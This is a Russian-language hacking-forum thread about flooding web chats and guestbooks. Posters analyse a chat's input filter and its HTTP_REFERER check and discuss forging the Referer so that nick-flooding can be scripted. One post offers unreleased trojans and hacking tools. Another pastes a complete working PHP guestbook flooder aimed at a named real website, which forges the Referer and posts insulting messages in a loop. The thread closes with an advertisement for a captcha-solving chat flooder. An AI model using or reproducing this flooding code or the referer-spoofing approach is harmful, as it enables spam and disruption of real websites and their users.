привет, античат для начала хочу сказать, что правильно сделали, что поставили форум - это очень кстати если это топ для повествований о флуде чатов, то хочу вам кое что рассказать. На примере одного чата. Вне все просто: на входе - ник, цвет по выбору и символьного кода, и запускают всех с паролем, где проканывает любое число. Как ни обидно, но существует ограничение на все вводимые символы, примерно похожее на такое: if ($in{'nick'}=~ tr/\/\\\+=~;<>*|`&$!#()[]{}:'" //) print "пользователь с таким ником уже существует!"; exit; пробел тоже фильтруется, а если вводишь в разных счислениях, то символы проходят как есть. Ну, а если к стоп-символам добавляешь произвольные символы(буквы/числа), то только они и проходят. Загружацца с их странички - в теле кода прописан скрипт с функцией donotdetect(), который не дает возможности сохранить образ. я скопировал сам код, убрал вызов функции и дописал пути до абсолютных. Затем в дело пошел ник-флудинг, о котором писал Algol. Флудилось все 12ю никами: по 3и, с секундной задержкой на каждый. хоть соединение было не очень шустрым, тем не мение, когда флудинг был остановлен в форточке повисла запись: "hacker? he-he..." т.е. стоял так же фильтр на переменные окружения, который сопоставлял заголовки, по примерно такому виду: <? $referer=getenv("HTTP_REFERER" if (!ereg("^http://www.myserver.com")) { echo "hacker? he-he...\n"; exit; } ?> Вообщем то вначале я думал, что просто стоит лимит на време между соединениями с одного ip, но потом нашел пример, который выше, и стало понятно, что это он и работает. и подвязали они его ко всем скриптам, т.е. фактически привязав все странички. Но зато есть возможность заходить в чат с 1го ip в несколько ников: об этом они не позаботились. следовательно можно, все таки отловить, для начала, полный post-запрос, изменить переменную заголовка, внести передаваемые значения формы и попытаться отправить, полностью эметировав реальную форму. (httpgen или inetcrack) если в результате будет log-in, то можно написать простой скриптик, на основе той же функции для ввода ника, но так, что бы каждому запросу постоянно присваивался соответственный (статичный) refer формы чата. Кто нибуть уже сталкивался с чем то подобным? мне так же очень интересны ваши комментарии и мнения. До внутренностей чата еще руки не доходили, но скажу сразу, что там нет таких интересных моментов, как вставки <img> и <bgsound>. Есть возможность изменять <maxlength> и вставлять очень длинные форматированные сообщения, но я проверю позже, т.к. это уже соовсем другое. Я ничего не имею против чата - меня интересует сам процесс. Зато уже долгое време у них в cgi-bin валяется скриптик www-sql
так никто и не ответил. Кто и как пытался обойти привязанный http-refer, при ник-флудинге? можно конечно подумать, и скрипт написать, но меня интересуют абсолютно все соображения по поводу.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (stooper @ марта 30 2004,21:38)</td></tr><tr><td id="QUOTE">так никто и не ответил. Кто и как пытался обойти привязанный http-refer, при ник-флудинге?[/QUOTE]<span id='postcolor'> А что, подделка реферера это проблема ? InetCrack не поможет ?
как я понимаю, инеткрэк меняет рефер на нужый, работая со статичными запросами: отловил-внес. какой от етого толк, если я использую флудинг из браузера, как хтмл-форму? здесь имеет смысл только использовать php или perl, для подделки рефера. меня интересовало только то, как это реализуется из скрипта. так что прога не поможет, если я конечно не захочу все это дело монотонно вносить и генерировать запрос руками
art, чат ломалки-обсиралки меня не интересуют что у ты можешь предложить стоящего из троянов? Может у тебя есть программа которая по ник-найму хозина откроет откроет его комп в WinCommander'е?)) ШУТКА. Что есть интересного не по чатам? (Под интересным понимаю любые проги по Хакингу не выложенные в нете)Тебе если хочешь я могу предложить пару ценных прог и скриптов в дополнение к Асе и ее клонам. Более подробное описание после твоего предложения
ну дак и запости. все на него поглазеют, некоторые зададут много вопросов, типа "а че это и вообще нах и как это заюзать "
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <?php # GB_Flooder Lite # Version 0.2 Public # Author: KAdot < [email protected] > # # Конфиг для гостевой баскова $tar_url = "http://www.baskov.ru/gb/index.xp"; $host = "www.baskov.ru"; $port = 80; $n = 10; $nick = "Любитель рока"; $city = "посёлок Малые Ебеньки"; $msg = "басков - позор Росии, таким не место на нашей Родине"; for ($i = 1; $i <= $n; $i++) { $q="action=".urlencode("write")."&section=".urlencode("post")."&page=".urlencode("0")."&name=".urlencode($nick)."&sex=".urlencode("Мужской")."&city=".urlencode($city)."&country=".urlencode("Россия")."&comment=".urlencode($msg); $query = "POST ".$tar_url." HTTP/1.1\r\n"; $query .= "Host: ".$host."\r\n"; $query .= "Referer: ".$tar_url."\r\n"; $query .= "User-Agent: Mozilla/4.0 (compatible; GB_Flooder Lite; Windows NT 5.1)\r\n"; $query .= "Content-Type: application/x-www-form-urlencoded\r\n"; $query .= "X-Flooder: GB_Flooder Lite Public Version 0.2 Author: KAdot <[email protected]>\r\n"; $query .= "Content-Length: ".strlen($q)."\r\n"; $query .= "\r\n".$q; $fp = fsockopen($host, 80); if (!$fp) {echo "Не могу открыть сокет"; exit;} else { fputs($fp, $query); fclose($fp); sleep(1); } } echo " <h2> GB_Flooder LIte </h2><br> Public Version 0.2 <br> Author: <a href='mailto:[email protected]'>KAdot</a> <br><br><br><br> Цель: <b>$tar_url</b><br> Отправлено сообщений: <b>$n</b>"; ?> [/QUOTE]<span id='postcolor'> Ловите, мля.
Я уже писал в другом разделе, ну и здесь напишу, флудер чатов xakep, xyligan, gameland, распознающий картинки сам. Описание читайте в разделе "Объявления".
